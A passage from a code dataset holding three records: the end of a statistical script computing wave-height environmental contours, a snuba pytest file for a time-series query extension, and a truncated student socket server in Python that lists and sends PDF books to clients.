df.columns[2])\n#plt.plot(bins, weibull_min.pdf(bins,*weib_par2), label='Weibull')\n#plt.plot(bins, lognorm.pdf(bins,*logn_par2), label='Lognorm')\n#plt.legend(loc='best')\n\n#%% Bin the data to find the conditoinal marginal distribution\ns_min = df[df.columns[1]].min()\ns_max = df[df.columns[1]].max()\n\nbin_size = 0.5\ns_bins = np.arange(np.floor(s_min), np.ceil(s_max), bin_size) + bin_size/2\ns_binedges = s_bins + bin_size/2\n\ns_ind_bin = np.digitize(df[df.columns[1]], bins=s_binedges)\n\nunique, counts = np.unique(s_ind_bin, return_counts=True)\n\nind_min_bin = unique[counts>10][0]\nind_max_bin = unique[counts>10][-1]\nx_bins = s_bins[ind_min_bin:ind_max_bin+1]\nreal_bins = np.zeros(len(x_bins))\n\nlogn_par_cond = np.zeros((len(x_bins),3))\nmu_cond = np.zeros(len(x_bins))\nsig_cond = np.zeros(len(x_bins))\n\nplot_bins = np.arange(0,14,0.2)\n\nfor i in range(len(x_bins)):\n mask1 = s_ind_bin == i + ind_min_bin\n real_bins[i] = df[df.columns[1]][mask1].mean()\n logn_par_cond[i,:] = lognorm.fit(df[df.columns[2]][mask1], floc=0)\n mu_cond[i] = np.mean(np.log(df[df.columns[2]][mask1]))\n sig_cond[i] = np.std(np.log(df[df.columns[2]][mask1]))\n# plt.figure()\n# b = plt.hist(df[df.columns[2]][mask1], bins= plot_bins, density=True)\n# plt.plot(b[1], lognorm.pdf(b[1],*logn_par_cond[i,:]), color='g')\n\n#bounds = ([0, 0, -np.inf], [np.inf, np.inf, np.inf])\nbounds = ([-1, 0, -np.inf], [np.inf, np.inf, np.inf])\np0_mu = [0, 2, 0.1]\np0_sig = [0.1, 0.1, -0.3]\n\nmu_vars = curve_fit(power3, real_bins, mu_cond, p0=p0_mu, bounds=bounds)[0]\nsig_vars = curve_fit(exp3, 
real_bins, sig_cond, p0=p0_sig, bounds=bounds)[0]\n\nsig_func = curve_fit(exp3, real_bins, logn_par_cond[:,0], p0=p0_sig, bounds=bounds)[0]\nmu_func = curve_fit(power3, real_bins, np.log(logn_par_cond[:,2]), p0=p0_mu, bounds=bounds)[0]\n\nplt.figure()\nplt.subplot(211)\nplt.plot(real_bins, np.log(logn_par_cond[:,2]), 'o')\nplt.plot(real_bins, mu_cond, 'o')\nplt.plot(x_bins, power3(x_bins, *mu_func))\nplt.ylabel(r'$\\mu$: scale parameter')\nplt.subplot(212)\nplt.plot(real_bins, logn_par_cond[:,0], 'o')\nplt.plot(real_bins, sig_cond, 'o')\nplt.plot(x_bins, exp3(x_bins, *sig_func))\nplt.plot(x_bins, exp3(x_bins, *sig_vars))\nplt.ylabel(r'$\\sigma$: shape parameter')\n\n\n#%% Perform the IDS\n\nT1 = 1\nT20 = 20\n\n#beta1 = norm.ppf(1- 10/(T1*len(df)))\n#beta20 = norm.ppf(1- 10/(T20*len(df)))\nbeta1 = np.sqrt(chi2.ppf(1- 10/(T1*len(df)), df=2))\nbeta20 = np.sqrt(chi2.ppf(1- 10/(T20*len(df)), df=2))\n\nphi = np.linspace(0, 2 * np.pi, 360, endpoint=False)\n\nu0_1 = beta1*np.cos(phi)\nu1_1 = beta1*np.sin(phi)\n\nu0_20 = beta20*np.cos(phi)\nu1_20 = beta20*np.sin(phi)\n\nx1_1 = lognorm.ppf( norm.cdf(u1_1), *logn_par1)\nx1_20 = lognorm.ppf( norm.cdf(u1_20), *logn_par1)\n\n# The weibull conditional distribution\nsig_x1_1 = exp3(x1_1, *sig_func)\nmu_x1_1 = power3(x1_1, *mu_func)\n\nsig_x1_20 = exp3(x1_20, *sig_func)\nmu_x1_20 = power3(x1_20, *mu_func)\n\nx0_1 = lognorm.ppf( norm.cdf(u0_1), sig_x1_1, loc=0, scale=np.exp(mu_x1_1))\nx0_20 = lognorm.ppf( norm.cdf(u0_20), sig_x1_20, loc=0, scale=np.exp(mu_x1_20))\n#%%\nh = sns.jointplot(x= df.columns[2] , y=df.columns[1] , data=df, s=5)\nh.x, h.y = x0_1, x1_1\nh.plot_joint(plt.plot, color='C1')\nh.x, h.y = x0_20, x1_20\nh.plot_joint(plt.plot, color='C2')\n\n#%% E1 requirements:\n# Save the contours as csv files in the required format.\nfolder_name = 'contour_coordinates/'\nfile_name_1 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T1)\nwrite_contour(x1_1, #y-axis\n x0_1,\n folder_name + file_name_1,\n label_x=df.columns[1],\n label_y=df.columns[2])\nfile_name_20 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T20)\nwrite_contour(x1_20,\n x0_20,\n folder_name + file_name_20,\n label_x=df.columns[1],\n label_y=df.columns[2])\n\n# Read the contours from the csv files.\n(contour_hs_1, contour_tz_1) = read_contour(folder_name + file_name_1)\n(contour_hs_20, contour_tz_20) = read_contour(folder_name + file_name_20)\n\n# Find datapoints that exceed the 20-yr contour.\nhs_outside, tz_outside, hs_inside, tz_inside = \\\n points_outside(contour_hs_20,\n contour_tz_20,\n np.asarray(df[df.columns[1]].values),\n np.asarray(df[df.columns[2]].values))\nprint('Number of points outside the contour: ' + str(len(hs_outside)))\n#%%\nnan_mask = np.isnan(contour_tz_20)\n\nfig = plt.figure(figsize=(5, 5), dpi=150)\nax = fig.add_subplot(111)\n\nplotted_sample = PlottedSample(x=np.asarray(sample_tz),\n y=np.asarray(sample_hs),\n ax=ax,\n x_inside=tz_inside,\n y_inside=hs_inside,\n x_outside=tz_outside,\n y_outside=hs_outside,\n return_period=T20)\n# Plot the 1-year contour.\nplot_contour(x=contour_tz_1,\n y=contour_hs_1,\n ax=ax,\n contour_label=str(T1) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b--',\n plotted_sample=plotted_sample)\n\n# Plot the 20-year contour and the sample.\nplot_contour(x=contour_tz_20[~nan_mask],\n y=contour_hs_20[~nan_mask],\n ax=ax,\n contour_label=str(T20) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b-')#,\n# plotted_sample=plotted_sample)\nplt.title('Dataset ' + 
DATASET_CHAR)\nplt.show()\nplt.savefig('../results/figures/hannesdottir_asta_dataset_'+DATASET_CHAR+'_1_20.png', dpi=300)", "sub_path": "participants-code/contribution-3/e1_baseline_dataset_a_to_c_asta.py", "file_name": "e1_baseline_dataset_a_to_c_asta.py", "file_ext": "py", "file_size_in_byte": 7528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.close", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "read_write.read_dataset", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 39, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 40, "usage_type": "name"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 42, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 43, "usage_type": "name"}, {"api_name": "scipy.stats.kstest", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.digitize", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 94, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 109, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 110, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 154, 
"usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 154, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 155, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 155, "usage_type": "call"}, {"api_name": "seaborn.jointplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 166, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 167, "usage_type": "call"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 172, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 173, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 180, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 181, "usage_type": "call"}, {"api_name": "contour_statistics.points_outside", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "plot.PlottedSample", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 197, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 205, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}]}
+{"seq_id": "270847276", "text": "from datetime import datetime, timedelta\nfrom typing import Any, MutableMapping, cast\n\nimport pytest\n\nfrom snuba import state\nfrom snuba.clickhouse.columns import ColumnSet\nfrom snuba.datasets.entities import EntityKey\nfrom snuba.query.conditions import (\n BooleanFunctions,\n ConditionFunctions,\n binary_condition,\n)\nfrom snuba.query.data_source.simple import Entity as QueryEntity\nfrom snuba.query.expressions import Column, Expression, Literal\nfrom snuba.query.logical import Query\nfrom snuba.query.timeseries_extension import TimeSeriesExtension\nfrom snuba.request.request_settings import HTTPRequestSettings\nfrom snuba.schemas import validate_jsonschema\n\n\ndef build_time_condition(\n time_columns: str, from_date: datetime, to_date: datetime\n) -> Expression:\n return binary_condition(\n BooleanFunctions.AND,\n binary_condition(\n ConditionFunctions.GTE,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, from_date),\n ),\n binary_condition(\n ConditionFunctions.LT,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, to_date),\n ),\n )\n\n\ntest_data = [\n (\n {\n \"from_date\": \"2019-09-19T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 19, 10), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"1970-01-01T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 18, 12), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"2019-09-19T10:05:30,1234\",\n \"to_date\": \"2019-09-19T12:00:34,4567\",\n },\n build_time_condition(\n \"timestamp\",\n datetime(2019, 9, 19, 10, 5, 30),\n datetime(2019, 9, 19, 12, 0, 34),\n ),\n 60,\n ),\n]\n\n\n@pytest.mark.parametrize(\n \"raw_data, expected_ast_condition, expected_granularity\", test_data,\n)\ndef test_query_extension_processing(\n raw_data: MutableMapping[str, Any],\n expected_ast_condition: Expression,\n expected_granularity: int,\n) -> None:\n state.set_config(\"max_days\", 1)\n extension = TimeSeriesExtension(\n default_granularity=60,\n default_window=timedelta(days=5),\n timestamp_column=\"timestamp\",\n )\n\n valid_data = validate_jsonschema(\n raw_data, cast(MutableMapping[str, Any], extension.get_schema())\n )\n query = Query(QueryEntity(EntityKey.EVENTS, ColumnSet([])))\n\n request_settings = HTTPRequestSettings()\n\n extension.get_processor().process_query(query, valid_data, request_settings)\n assert query.get_condition() == expected_ast_condition\n assert query.get_granularity() == expected_granularity\n", "sub_path": "tests/query/test_timeseries_extension.py", "file_name": "test_timeseries_extension.py", "file_ext": "py", "file_size_in_byte": 2985, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 25, "usage_type": "call"}, {"api_name": "snuba.query.conditions.BooleanFunctions.AND", "line_number": 26, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.BooleanFunctions", "line_number": 26, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 27, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.GTE", "line_number": 28, "usage_type": "attribute"}, 
{"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 28, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 30, "usage_type": "call"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 32, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.LT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 33, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 35, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 83, "usage_type": "name"}, {"api_name": "snuba.state.set_config", "line_number": 86, "usage_type": "call"}, {"api_name": "snuba.state", "line_number": 86, "usage_type": "name"}, {"api_name": "snuba.query.timeseries_extension.TimeSeriesExtension", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "snuba.schemas.validate_jsonschema", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 94, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 94, "usage_type": "name"}, {"api_name": "snuba.query.logical.Query", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.query.data_source.simple.Entity", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.datasets.entities.EntityKey.EVENTS", "line_number": 96, "usage_type": "attribute"}, {"api_name": "snuba.datasets.entities.EntityKey", "line_number": 96, "usage_type": "name"}, {"api_name": "snuba.clickhouse.columns.ColumnSet", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.request.request_settings.HTTPRequestSettings", "line_number": 98, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 78, "usage_type": "attribute"}]}
+{"seq_id": "428771751", "text": "#Modulo servidor para el Proyecto 1 de Redes 1 Enero Marzo 2018\n#Integrantes: Salvador Gonzalez - 10-10296\n#\t\t\t Valentina Hernandez - 10-10352 \nfrom __future__ import print_function\nfrom time import sleep\nimport datetime as d\nimport os,signal\nimport sys\nimport socket as s\n\n#Funcion para listar las descargas completadas de los libros:\ndef listCompleted():\n\tprint()\n\ttry:\n\t\tfile = open(\"./Downladed_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tprint()\n\texcept:\n\t\tprint(\"No se han completado descargas todavia...\")\n#Funcion encargada de obtener la lista de todos los clientes que han consultado al servidor\ndef getClients():\n\tprint()\n\ttry:\n\t\tfile = open(\"./sessions.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tfile.close()\n\texcept:\n\t\tprint(\"El servidor todavia no ha sido consultado...\")\n#Funcion encargada de Mandarle la lista de los pdfs presentes en el servidor al cliente\n#@Param socket: cliente al cual se le enviara la informacion\ndef getBookList(socket):\n\tbooklist = os.listdir(\"./Pdfs\")\n\tfor book in booklist:\n\t\tsocket.send(book)\n\t\tsocket.send(\" \")\n\tsocket.send(\"#\")\n#Funcion para listar el numero de descargas x cliente y por libro\ndef listBookClient():\n\tocurrencias_c = {}#Diccionario para las ocurrencias de los clientes\n\tocurrencias_b = {}#Diccionario para las ocurrencias de los libros\n\tprint()\n\ttry:\n\t\tfile = open(\"./Client_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tclient,libro,nulo = line.split(\"-\")\n\t\t\tif client in ocurrencias_c:\n\t\t\t\tocurrencias_c[client] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_c[client] = 1\n\t\t\tif libro in ocurrencias_b:\n\t\t\t\tocurrencias_b[libro] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_b[libro] = 1\n\t\tprint(\"Numero de descargas por libro\")\n\t\tfor key in ocurrencias_b:\n\t\t\tprint(\"Libro: %s - Descargas: %s\"%(key,ocurrencias_b[key]))\n\t\tprint()\n\t\tprint(\"Numero de descargas por cliente\")\n\t\tfor key in ocurrencias_c:\n\t\t\tprint(\"Cliente: %s - Descargas: %s\"%(key,ocurrencias_c[key]))\n\texcept:\n\t\tprint(\"No se han realizado descargas en este servidor....\")\n#Funcion para listar las descargas en curso\ndef listDownloads():\n\tdownList = os.listdir(\"./Server_info\")\n\tif downList:\n\t\tfor download in downList:\n\t\t\tfile = open(\"./Server_info/%s\"%(download),\"r\")\n\t\t\tprint()\n\t\t\tprint(file.readline(),end=\"\")\n\t\t\tfile.close()\n\t\tprint()\n\telse:\n\t\tprint(\"\\nNo existen descargas en curso actualmente....\")\n#Funcion para el envio del alchivo al cliente\n#@Param socket: cliente al cual se le enviara el archivo\n#@Param info: informacion del cliente al cual se le enviara el pdf tupla (IP,PUERTO)\n#@Param pid: PID del proceso que envia el archivo para llevar el estatus de descarga\ndef sendBook(socket,info,pid):\n\tbook = socket.recv(200)#Variable para contener la informacion del libro (paquete de tamano fijo)\n\tbook = filter(lambda x: x!=\" \",book)#obtenemos el nombre\n\tfilesize = str(os.path.getsize(\"./Pdfs/%s\"%(book)))#Tamagno en bytes del archivo a enviar\n\twhile(len(filesize) < 10):\n\t\tfilesize+=\" \"\n\tsocket.send(filesize)\n\tfilesize = filter(lambda x: x != \" \",filesize)\n\t#Archivo que deseamos enviar\n\tfile = open(\"./Pdfs/%s\"%(book),\"r\")\n\tread = 0 #Variable para los bytes leidos\n\tdata = \" \"#Variable para guardar la data\n\twhile(data != \"\"):\n\t\t#Archivo para guardar el status de la descarga\n\t\tstatus = 
open(\"./Server_info/%s.txt\"%(pid),\"w\")\n\t\tdata = file.read(1000)\n\t\tread += len(data)\n\t\tsocket.send(data)\n\t\tstatus.write(\"CLiente: %s - Libro: %s - %s de %s bytes...\"%(info[0],book,read,filesize))\n\t\tstatus.close()\n\t\tsleep(3)\n\tfile.close()\n\tos.remove(\"./Server_info/%s.txt\"%(pid))\n\t#Si se completa la descarga/ anadimos el libro a la lista de descargas\n\tdate = d.datetime.now()\n\tfile = open(\"./Downladed_Books.txt\",\"a\")\n\tfile.write(\"Libro: %s - Fecha: %s-%s-%s - Hora: %s:%s:%s\\n\"%(book,date.day,date.month,date.year,date.hour,date.minute,date.second))\n\tfile.close()\n\t#Registro para el num de descargas x libro x cliente\n\tfile = open(\"./Client_Books.txt\",\"a\")\n\tfile.write(\"%s-%s-\\n\"%(info[0],book))\n\tfile.close()\n\ndef main():\n\tif (len(sys.argv) != 2):\n\t\tprint(\"La invocacion para el servidor debe ser de la forma: \",end=\"\")\n\t\tprint(\"python server.py \")\n\t\treturn\n\tport = sys.argv[1]#Numero de puerto para el socket\n\tserver_info = (\"\",int(port))#Informacion de nuestro servidor\n\t#la tupla contiene informacion referente a (Direccion Ip,Puerto de escucha)\n\t#Definimos el socket de para nuestro servidor\n\t#AF_INET y SOCK_STREAM son parametros para utilizar Protocolo TCP\n\t#AF_INET es para direcciones IPv4\n\tprint(\"Generando socket...\")\n\tsleep(1)\n\ttry:\n\t\tserver_socket = s.socket(s.AF_INET,s.SOCK_STREAM)\n\t\tprint(\"socket creado...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al generar el Socket para el servidor...\")\n\t\treturn\n\tprint(\"Asociando puerto %s al socket...\" % port)\n\tsleep(1)\n\ttry:\n\t\tserver_socket.bind(server_info)\n\t\tprint(\"Asociancion establecida...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al asociar el puerto al socket...\")\n\t\treturn\n\t#Creamos el directorio para la informacion del server:\n\ttry:\n\t\tos.mkdir(\"./Server_info\")\n\texcept:\n\t\tfiles = os.listdir(\"./Server_info\")\n\t\tfor file in files:\n\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t#Proceso hijo para la escuha de las peticiones\n\tconnection_handler = os.fork()\n\t#Codigo para el proceso hijo\n\tif connection_handler == 0:\n\t\t#Guardamos el PID del hijo para cerrarlo al finalizar el programa\n\t\tp_id = str(os.getpid())\n\t\tfile = open(\"./listen_process.txt\",\"w\")\n\t\tfile.write(p_id)\n\t\tfile.close()\n\t\twhile True:\n\t\t\t#Listen se encarga de escuchar las peticiones, el valor 100 esel tama;o de la cola\n\t\t\t#de peticiones que puede recibir el servidor\n\t\t\tserver_socket.listen(100)\n\t\t\t#Esperamos aceptar las peticiones de los clientes\n\t\t\t#client_info es una tupla de la forma (IP,PUERTO)\n\t\t\tclient_socket,client_info = server_socket.accept()\n\t\t\t#Anadimos la sesion\n\t\t\tfile = open(\"./sessions.txt\",\"a\")\n\t\t\tdate = d.datetime.now()\n\t\t\tfile.write(\"Cliente: %s Fecha: %s-%s-%s Hora: %s:%s:%s\\n\" %(client_info[0],date.day,date.month,date.year,date.hour,date.minute,date.second))\n\t\t\tfile.close()\n\t\t\t#Se vuelve a crear un fork para atender las peticiones una ve escuchadas\n\t\t\trequest_processor = os.fork()\n\t\t\t#Codigo para el proceso hijo encargado de atender/ejecutar las peticiones\n\t\t\tif (request_processor == 0):\n\t\t\t\tp_id = str(os.getpid())\n\t\t\t\toption = client_socket.recv(1)\n\t\t\t\tif option == \"2\":\n\t\t\t\t\tgetBookList(client_socket)\n\t\t\t\telif option == \"3\":\n\t\t\t\t\tsendBook(client_socket,client_info,p_id)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\t\tquit()\n\t#codigo para el proceso padre - Menu principal\n\telse:\n\t\toption 
